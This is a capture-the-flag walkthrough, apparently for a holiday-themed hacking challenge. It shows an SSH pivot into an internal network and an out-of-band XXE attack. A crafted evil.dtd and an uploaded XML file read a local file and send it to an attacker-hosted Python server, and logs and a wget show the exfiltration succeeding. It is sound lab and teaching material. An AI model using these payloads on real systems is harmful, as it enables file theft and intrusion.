# Use l2s as pivot into internal network: 10.142.0.0/24
# ssh alabaster_snowball@35.185.84.51 -L 80:10.142.0.13:80

# Create evil.dtd on l2s server, with following echo commands
# piping through tee is used to work around the restrictions imposed by rbash shell
echo '<?xml version="1.0" encoding="UTF-8"?>' | tee -a evil.dtd
echo '<!ENTITY % stolendata SYSTEM "file:///c:/greatbook.txt">' | tee -a evil.dtd
echo '<!ENTITY % inception "<!ENTITY &#x25; sendit SYSTEM '"'"'http://10.142.0.11:65080/?%stolendata;'"'"'>">' | tee -a evil.dtd

# Results in the following XML 
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % stolendata SYSTEM "file:///c:/greatbook.txt">
<!ENTITY % inception "<!ENTITY &#x25; sendit SYSTEM 'http://10.142.0.11:65080/?%stolendata;'>">

# Start a python SimpleHTTPServer on a high numbered port (greater than 1024, as you need to be root to bind port numbers below this). We select TCP port 65080, to host evil.dtd and receive stolen data:
alabaster_snowball@l2s:/tmp/asnow.oxVI1YcZwwfqSPSIWmswbcD5$ python -m SimpleHTTPServer 65080


# From web-browser on our kali host, access the eaas site, (using the port we already forwarded port)
#	http://127.0.0.1/Home/DisplayXML , we upload the following XML file (exploit.xml): 
Upload XML file, containing 
< ?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE demo [
     <!ELEMENT demo ANY >
     <!ENTITY % extentity SYSTEM “http://10.142.0.11:65080/evil.dtd">
     %extentity;
     %inception;
     %sendit;
     ]
>

# In our terminal l2s terminal (running the SimpleHTTPServer we now see the EEAS server request the evil.dtd file, before exfiltrating the contents of the greatbook.txt file in a second GET request.
alabaster_snowball@l2s:/tmp/asnow.oxVI1YcZwwfqSPSIWmswbcD5$ python -m SimpleHTTPServer 65080
Serving HTTP on 0.0.0.0 port 65080 ...
10.142.0.13 - - [18/Dec/2017 23:14:56] "GET /evil.dtd HTTP/1.1" 200 -
10.142.0.13 - - [18/Dec/2017 23:14:56] "GET /?http://eaas.northpolechristmastown.com/xMk7H1NypzAqYoKw/greatbook6.pdf HTTP/1.1" 200 –

# With this information we now download the sixth page of the greatbook.
alabaster_snowball@l2s:/tmp/asnow.oxVI1YcZwwfqSPSIWmswbcD5$ wget http://eaas.northpolechristmastown.com/xMk7H1NypzAqYoKw/greatbook6.pdf
--2017-12-18 23:19:50--  http://eaas.northpolechristmastown.com/xMk7H1NypzAqYoKw/greatbook6.pdf
Resolving eaas.northpolechristmastown.com (eaas.northpolechristmastown.com)... 10.142.0.13
Connecting to eaas.northpolechristmastown.com (eaas.northpolechristmastown.com)|10.142.0.13|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1387677 (1.3M) [application/pdf]
Saving to: ‘greatbook6.pdf’

greatbook6.pdf                                       100%[=====================================>]   1.32M  --.-KB/s    in 0.01s   

2017-12-18 23:19:50 (94.7 MB/s) - ‘greatbook6.pdf’ saved [1387677/1387677]

alabaster_snowball@l2s:/tmp/asnow.oxVI1YcZwwfqSPSIWmswbcD5$ sha1sum greatbook6.pdf
8943e0524e1bf0ea8c7968e85b2444323cb237af  greatbook6.pdf


